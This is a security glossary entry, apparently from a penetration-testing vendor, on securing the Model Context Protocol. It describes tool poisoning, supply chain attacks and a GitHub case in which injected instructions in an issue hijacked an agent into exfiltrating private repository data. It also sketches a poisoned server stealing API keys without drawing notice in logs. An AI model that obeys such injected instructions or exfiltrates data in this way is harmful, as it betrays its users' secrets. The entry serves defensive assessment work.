MCP Security

What is MCP Security?

MCP security refers to the practice of securing implementations of the Model Context Protocol (MCP) — an open standard introduced by Anthropic that allows large language models to connect to external tools, APIs, databases, and data sources. MCP functions as an integration layer between AI models and the real-world systems they act upon, enabling capabilities like web search, code execution, file access, and third-party service interaction. Because MCP dramatically expands what an AI agent can do, it also dramatically expands the attack surface of any AI deployment that uses it.

Description

Security researchers identified multiple vulnerability classes in MCP ecosystems shortly after its adoption began scaling in 2025. Tool poisoning occurs when a malicious or compromised MCP server misrepresents its capabilities to an AI model, causing it to execute unintended actions. Privilege escalation is possible when MCP servers are configured with overly broad permissions that extend to connected tools and data sources. Remote code execution vulnerabilities have been documented in specific MCP server implementations. Supply chain attacks targeting MCP ecosystems involve injecting malicious logic into popular open-source MCP server packages, which are then downloaded and integrated by developers without thorough security review. In one documented case, a GitHub MCP server allowed a malicious issue to inject hidden prompt injection instructions that hijacked an AI agent and triggered data exfiltration from private repositories. The core security principle for MCP deployments mirrors that of any integration layer: verify what each server can access, enforce least privilege, audit all tool invocations, and treat MCP servers as trust boundaries requiring explicit authentication and authorization, not implicit trust.

Usage and Examples

An enterprise deploys an internal AI coding assistant connected to its GitHub repository via an MCP server. A developer installs a community-contributed MCP server that has been tampered with in a supply chain attack. The poisoned server, when invoked by the AI assistant, silently reads private source code, extracts API keys from environment variables, and exfiltrates them to an attacker-controlled endpoint — all within routine coding workflow operations that look benign in logs. Because MCP transactions occur between the model and connected systems rather than through user-facing interfaces, traditional application security monitoring may miss these exfiltration events entirely. Organizations managing agentic AI deployments should maintain an inventory of all MCP servers in use, validate their provenance, and monitor tool invocation logs for anomalous patterns.

How Does This Relate to Penetration Testing?

Assessing MCP security requires penetration testers to evaluate the full integration chain connecting AI models to external systems. This includes reviewing MCP server configurations for overprivileged access, testing for tool poisoning scenarios, attempting prompt injection through MCP-connected data sources, and analyzing authentication mechanisms governing MCP server connections. As MCP adoption accelerates, security assessments of AI-powered applications should explicitly scope MCP integrations as attack surfaces. Evolve Security's AI penetration testing engagements cover MCP security as part of a comprehensive AI attack surface review. Evolve Security's AI Penetration Testing service assesses MCP configurations and agentic AI architectures to identify privilege escalation paths, tool poisoning risks, and supply chain exposure.